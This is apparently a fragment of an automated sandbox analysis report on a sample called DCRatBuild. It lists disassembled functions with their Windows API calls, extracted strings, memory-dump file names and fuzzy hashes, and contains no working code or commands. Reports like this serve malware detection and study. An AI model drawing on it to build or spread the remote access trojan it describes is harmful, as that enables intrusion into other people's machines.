                                                                                                                          • Part of subcall function 004A1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,004D1030,00000200,0049D928,00000000,?,00000050,004D1030), ref: 004A1DC4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                        • String ID: $%s$@%s
                                                                                                                        • API String ID: 562999700-834177443
                                                                                                                        • Opcode ID: ddfd854e52318f5af5407df1586241b046d4f86b10214ab3c44a47133a2d2a3e
                                                                                                                        • Instruction ID: 11af0c8ec5efaf1766013f6afa04cd3c83a736fdc7c74951a06d6286eb5ff2eb
                                                                                                                        • Opcode Fuzzy Hash: ddfd854e52318f5af5407df1586241b046d4f86b10214ab3c44a47133a2d2a3e
                                                                                                                        • Instruction Fuzzy Hash: 1221A2B2840248AEDF20EEA4CC05FDE7FA8AF05304F544027F910962A2E37AD659CB59
                                                                                                                        Function 004A0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0049AC5A,00000008,?,00000000,?,0049D22D,?,00000000), ref: 004A0E85
                                                                                                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0049AC5A,00000008,?,00000000,?,0049D22D,?,00000000), ref: 004A0E8F
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0049AC5A,00000008,?,00000000,?,0049D22D,?,00000000), ref: 004A0E9F
                                                                                                                        Strings
                                                                                                                        • Thread pool initialization failed., xrefs: 004A0EB7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                        • String ID: Thread pool initialization failed.
                                                                                                                        • API String ID: 3340455307-2182114853
                                                                                                                        • Opcode ID: bdb3c9ca6319e87cc12698d59c4df3d248cff3ebbb70c7abdaecaf2bd0d6e661
                                                                                                                        • Instruction ID: eb878c9483c272f20aeed3b0e4d3950b7c96672436d959d8096afd3a1a3b525e
                                                                                                                        • Opcode Fuzzy Hash: bdb3c9ca6319e87cc12698d59c4df3d248cff3ebbb70c7abdaecaf2bd0d6e661
                                                                                                                        • Instruction Fuzzy Hash: C11151B26407089FC3315F6A9C84AA7FBECEB6A744F14882FF1DAC2200D67959419B58
                                                                                                                        Function 0049124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Malloc
                                                                                                                        • String ID: (J$2J$A
                                                                                                                        • API String ID: 2696272793-1974247778
                                                                                                                        • Opcode ID: 951d5c53a36bf5989a34278bff322231f329df49d51818dd69de9a503170e9d3
                                                                                                                        • Instruction ID: 714437d4d72dcb476d42bca8f82fb6ba0dda786d78d7887d73cc47488ee3dc54
                                                                                                                        • Opcode Fuzzy Hash: 951d5c53a36bf5989a34278bff322231f329df49d51818dd69de9a503170e9d3
                                                                                                                        • Instruction Fuzzy Hash: FA01DB75901219AFCF14DFA4D8449EEBBF8EF09314B1041ABE905E3350D7749A51CF98
                                                                                                                        Function 004ADCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                        • API String ID: 0-56093855
                                                                                                                        • Opcode ID: 482c9d05a4cedd07ee2d2a1359b4df6fa39fe32b19b924c450f8ed1289311646
                                                                                                                        • Instruction ID: bacc2521322511d208117476f594a4e4047197bb155fe9057e3a92549dbc154e
                                                                                                                        • Opcode Fuzzy Hash: 482c9d05a4cedd07ee2d2a1359b4df6fa39fe32b19b924c450f8ed1289311646
                                                                                                                        • Instruction Fuzzy Hash: 4001B176A05245AFEB119F55FC44AAB3FA8F72A344B10443BF806C3630D7349850DBAD
                                                                                                                        Function 00491316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0049E2E8: _swprintf.LIBCMT ref: 0049E30E
                                                                                                                          • Part of subcall function 0049E2E8: _strlen.LIBCMT ref: 0049E32F
                                                                                                                          • Part of subcall function 0049E2E8: SetDlgItemTextW.USER32(?,004CE274,?), ref: 0049E38F
                                                                                                                          • Part of subcall function 0049E2E8: GetWindowRect.USER32(?,?), ref: 0049E3C9
                                                                                                                          • Part of subcall function 0049E2E8: GetClientRect.USER32(?,?), ref: 0049E3D5
                                                                                                                        • GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                        • SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                        • String ID: J$0
                                                                                                                        • API String ID: 2622349952-163445241
                                                                                                                        • Opcode ID: d333e29e8ce844b5acaf32526467dd4df979d24750f9a2a6c1f6b9d487ad3554
                                                                                                                        • Instruction ID: 9ca74078a3852aed00dce0bfd0fd9d7b36f62059798ef6da6bdfdba71184bcef
                                                                                                                        • Opcode Fuzzy Hash: d333e29e8ce844b5acaf32526467dd4df979d24750f9a2a6c1f6b9d487ad3554
                                                                                                                        • Instruction Fuzzy Hash: 27F03130104289B6EF255F51880DBAA3F79AB44345F0481BAFC4455AB1CB7CC990DA58
                                                                                                                        Function 004B9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1036877536-0
                                                                                                                        • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                        • Instruction ID: b1f6c87a6e8c54849c1ae3835cfa75d6624dc5fcd3c907931274aaf3451facfe
                                                                                                                        • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                        • Instruction Fuzzy Hash: 50A13672A042869FEB158F29C8917EABFF5EF55310F18416FE6459B381C23C9D42C768
                                                                                                                        Function 0049A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00497F69,?,?,?), ref: 0049A3FA
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00497F69,?), ref: 0049A43E
                                                                                                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00497F69,?,?,?,?,?,?,?), ref: 0049A4BF
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000800,?,00497F69,?,?,?,?,?,?,?,?,?,?), ref: 0049A4C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Create$CloseHandleTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2287278272-0
                                                                                                                        • Opcode ID: c5b38de2eae29361014085dbc49587606128b579cdc19bff02967cd008fc7e04
                                                                                                                        • Instruction ID: 7adcb12c0a11976fa5753368dbb36fcfa2e4bff8b1bf881a2ea5c03b5a4823d0
                                                                                                                        • Opcode Fuzzy Hash: c5b38de2eae29361014085dbc49587606128b579cdc19bff02967cd008fc7e04
                                                                                                                        • Instruction Fuzzy Hash: 9C41E3311483819AEB31DF24DC49FAFBBE49B85304F14092EB9D1D3290D6A89A58DB97
                                                                                                                        Function 004BC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004B91E0,?,00000000,?,00000001,?,?,00000001,004B91E0,?), ref: 004BC9D5
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004BCA5E
                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004B6CBE,?), ref: 004BCA70
                                                                                                                        • __freea.LIBCMT ref: 004BCA79
                                                                                                                          • Part of subcall function 004B8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BCA2C,00000000,?,004B6CBE,?,00000008,?,004B91E0,?,?,?), ref: 004B8E38
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2652629310-0
                                                                                                                        • Opcode ID: ca6f382902c40912baa26b4ec6f3c2e8418fd51c216169e4cfd4dc76bb1bdba1
                                                                                                                        • Instruction ID: 6807e83dc33487605d81dddedfaa05e3cdfc2672cdee050cd8297b066608f830
                                                                                                                        • Opcode Fuzzy Hash: ca6f382902c40912baa26b4ec6f3c2e8418fd51c216169e4cfd4dc76bb1bdba1
                                                                                                                        • Instruction Fuzzy Hash: 0C31B072A0020AABDF25DF65CCC1EEF7BA5EB45310B04416AFC14E6251EB39DD50CBA4
                                                                                                                        Function 004AA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 004AA666
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 004AA675
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004AA683
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004AA691
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1035833867-0
                                                                                                                        • Opcode ID: 66af768b3ffc2d5b4c24415d3609fb76e6133078b3f06bc9f6c32b00e866557a
                                                                                                                        • Instruction ID: a319cc4e22d8e13d0b102212a2746ebca9b01591952b93fce7e8bb04d13c2d94
                                                                                                                        • Opcode Fuzzy Hash: 66af768b3ffc2d5b4c24415d3609fb76e6133078b3f06bc9f6c32b00e866557a
                                                                                                                        • Instruction Fuzzy Hash: 10E0EC31982721BBD6615F70AC0DBAB3F54EB15B53F014127FA0596194EF648610CBA9
                                                                                                                        Function 004AD06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr
                                                                                                                        • String ID: .lnk$dJ
                                                                                                                        • API String ID: 2691759472-862619046
                                                                                                                        • Opcode ID: bc6f4c2e936341dd4eb5268612834b663299da7f0ff1519406712bd8c8492916
                                                                                                                        • Instruction ID: 6816e714b3711c55559553ebf5c592b18455a8610f61d521382501c6702a1b00
                                                                                                                        • Opcode Fuzzy Hash: bc6f4c2e936341dd4eb5268612834b663299da7f0ff1519406712bd8c8492916
                                                                                                                        • Instruction Fuzzy Hash: 00A15F72C001299ADF24DBA08D45EFB73FCAF55304F0885E7B50AE7141EE389A858B69
                                                                                                                        Function 004975DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 004975E3
                                                                                                                          • Part of subcall function 004A05DA: _wcslen.LIBCMT ref: 004A05E0
                                                                                                                          • Part of subcall function 0049A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0049A598
                                                                                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0049777F
                                                                                                                          • Part of subcall function 0049A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A501
                                                                                                                          • Part of subcall function 0049A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A532
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 3226429890-336475711
                                                                                                                        • Opcode ID: 52073a4601031cf93266441daeecdd320c197ba25b1901aef6bd2c27b2855201
                                                                                                                        • Instruction ID: 9d512eafada60d528c4cedba1e034ca995dc71e64ae9856dd5f258321aa09aaf
                                                                                                                        • Opcode Fuzzy Hash: 52073a4601031cf93266441daeecdd320c197ba25b1901aef6bd2c27b2855201
                                                                                                                        • Instruction Fuzzy Hash: AE419071800158A9EF25EB65CC59EEFBB78AF51304F0080FFB605A2192DB785F85CB69
                                                                                                                        Function 0049B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr
                                                                                                                        • String ID: *
                                                                                                                        • API String ID: 2691759472-163128923
                                                                                                                        • Opcode ID: eec6b0c0ac14c81eb7c9846dc6ae13ecf87d2f5cc818caff4d23694ab125f373
                                                                                                                        • Instruction ID: 61b9ecadd6535cd0ad7e100ef211a320b9151dd7840e6c22ccaf3674bec6494e
                                                                                                                        • Opcode Fuzzy Hash: eec6b0c0ac14c81eb7c9846dc6ae13ecf87d2f5cc818caff4d23694ab125f373
                                                                                                                        • Instruction Fuzzy Hash: FD3116221443119A9E30EE55BB0267B7BE4DF94B14B15813FFD8447243E76D8C42B2EA
                                                                                                                        Function 004AB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: }
                                                                                                                        • API String ID: 176396367-4239843852
                                                                                                                        • Opcode ID: 731f91e679ba86f575d9aacf6327a422988d3db00526ecd6149ab5cc04fce725
                                                                                                                        • Instruction ID: 0c6e468c1c3a6d37ade953cfe31db01daf13afbb80485f4caa9fb012d75df6a5
                                                                                                                        • Opcode Fuzzy Hash: 731f91e679ba86f575d9aacf6327a422988d3db00526ecd6149ab5cc04fce725
                                                                                                                        • Instruction Fuzzy Hash: C621CF629043066ADB31AA65D845AABB3DCDFA6758F04042FF54083243EB6CDD4883FA
                                                                                                                        Function 0049F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0049F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0049F2E4
                                                                                                                          • Part of subcall function 0049F2C5: GetProcAddress.KERNEL32(004D81C8,CryptUnprotectMemory), ref: 0049F2F4
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,0049F33E), ref: 0049F3D2
                                                                                                                        Strings
                                                                                                                        • CryptProtectMemory failed, xrefs: 0049F389
                                                                                                                        • CryptUnprotectMemory failed, xrefs: 0049F3CA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$CurrentProcess
